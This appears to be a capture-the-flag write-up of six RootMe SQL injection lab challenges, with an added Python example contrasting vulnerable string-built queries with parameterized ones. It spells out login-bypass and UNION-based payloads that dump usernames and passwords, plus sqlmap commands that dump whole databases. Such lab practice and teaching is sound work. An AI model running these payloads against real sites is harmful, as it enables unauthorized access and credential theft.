RootMe - SQL Injection Challenges
RootMe challenge walkthroughs - SQL Injection Authentication, String, Numeric, Error, Time Based, Blind
RootMe – SQL Injection Challenges (Web-Client)
Just solved a bunch of SQL injection challenges on RootMe. These are all about finding injection points in web apps, using manual queries or sqlmap to dump credentials. Here are my quick notes for each one.
1. SQL injection - Authentication
1) Retrieve the administrator password
Analysis
1) Basic login page with two input fields, username and password.
Solution steps
1) Trying to inject with ' in the username input, I got this error:
2) That means SQL injection is here.
3) Inject the username with admin'-- and I got it:
4) Inspect the page and got the password:
Finished..Happy Hacking..!
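The behaviour seen in challenge 1, reproduced against a constructed in-memory SQLite database next to the parameterized fix. This is an added example, not code from the challenge or from the original notes; the schema, sample passwords and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; the schema and passwords are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "constructed-admin-pw"), ("guest", "constructed-guest-pw")])
    return db

def login_concat(db, username, password):
    # Vulnerable pattern: input is spliced into the SQL text, so a quote in
    # the username closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, username, password):
    # Hardened pattern: ? placeholders bind the input as values, so quotes
    # and -- stay inside the compared string and never reach the SQL parser.
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None

def outcome(login, username, password="wrong"):
    # Returns the logged-in user, None for a rejected login, or "sql-error"
    # when the database reports a syntax error (the signal seen in step 1).
    try:
        return login(make_db(), username, password)
    except sqlite3.OperationalError:
        return "sql-error"

if __name__ == "__main__":
    for name in ["'", "admin'--", "admin"]:
        print(repr(name), "concat:", outcome(login_concat, name),
              "| param:", outcome(login_param, name))
```

With bound parameters the same inputs are simply treated as a username that does not exist, so neither the error nor the bypass occurs.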
2. SQL injection - String
Mission
1) Retrieve the administrator password
Solution steps
1) Open the challenge and I find 3 tabs: home, search, login.
2) Start with search and inject it with '--
3) I got some information:
4) I used union and it succeeded.
5) Trying to find the number of columns with 'union select null;-- and it gave an error:
6) Try union select null,null;-- and it succeeds:
7) I try to find the tables with union SELECT tbl_name ,null FROM sqlite_master WHERE type='table'-- and the tables are users, new;
8) Dump the column names with SELECT null,sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'
9) Now get the usernames and passwords with a simple query: 'union select username,password from users--
Finished..Happy Hacking..!
3. SQL injection - Numeric
Mission
1) Retrieve the administrator password.
Analysis
1) The challenge has a login form and some tabs.
2) I open Burp to record all traffic and open all tabs to see if there are parameters that don't appear in the page:
3) I find a param id, and when I inject it with ' I find a SQLite error, and this is the point.
Solution steps
1) This is union-based SQLi, and when I change id to 3+union+select+1,2,3-- the numbers 2 and 3 appear in the page:
2) Trying to find the database structure with union SELECT 1,sql,3 FROM sqlite_master, I find the table name is users and the columns are username and password:
3) Get the admin password with the query union select 1,username,password from users--:
sqlmap can do it faster, but I need to practice queries.
Finished..Happy Hacking..!
From this challenge on I will use sqlmap.
4. SQL injection - Error
Mission
1) Retrieve the administrator password.
Analysis
1) The challenge has a login form and some tabs.
2) I open Burp to record all traffic and open all tabs to see if there are parameters that don't appear in the page:
Solution
1) Send the request to Repeater, add * after asc and save the request in the file r.txt:
2) Using sqlmap:
python3 sqlmap.py -r ../Documents/r.txt --dump --batch
Finished..Happy Hacking..!
5. SQL injection - Time based
Mission
1) Retrieve the administrator password.
Analysis
1) The challenge has a login form and some tabs.
2) I open Burp to record all traffic and open all tabs to see if there are parameters that don't appear in the page.
Solution
1) After enumerating the application I find the member parameter; mark it with * to make it easy for sqlmap:
2) Save the request to r.txt and run sqlmap:
python3 sqlmap.py -r ../Documents/r.txt --dump --batch --time-sec 10
3) After 15 minutes sqlmap finds all the credentials:
Finished..Happy Hacking..!
6. SQL injection - Blind
Mission
1) Retrieve the administrator password.
Analysis
1) The challenge has a login form with two inputs, username and password.
2) I test admin'-- and I get into the application ???:
3) I don't know how it's that easy, but we still need to get the password.
Solution
1) After testing the injection point username I copy the request to r.txt and start sqlmap:
python3 sqlmap.py -r ../Documents/r.txt --dump --batch --time-sec 10
Finished..Happy Hacking..!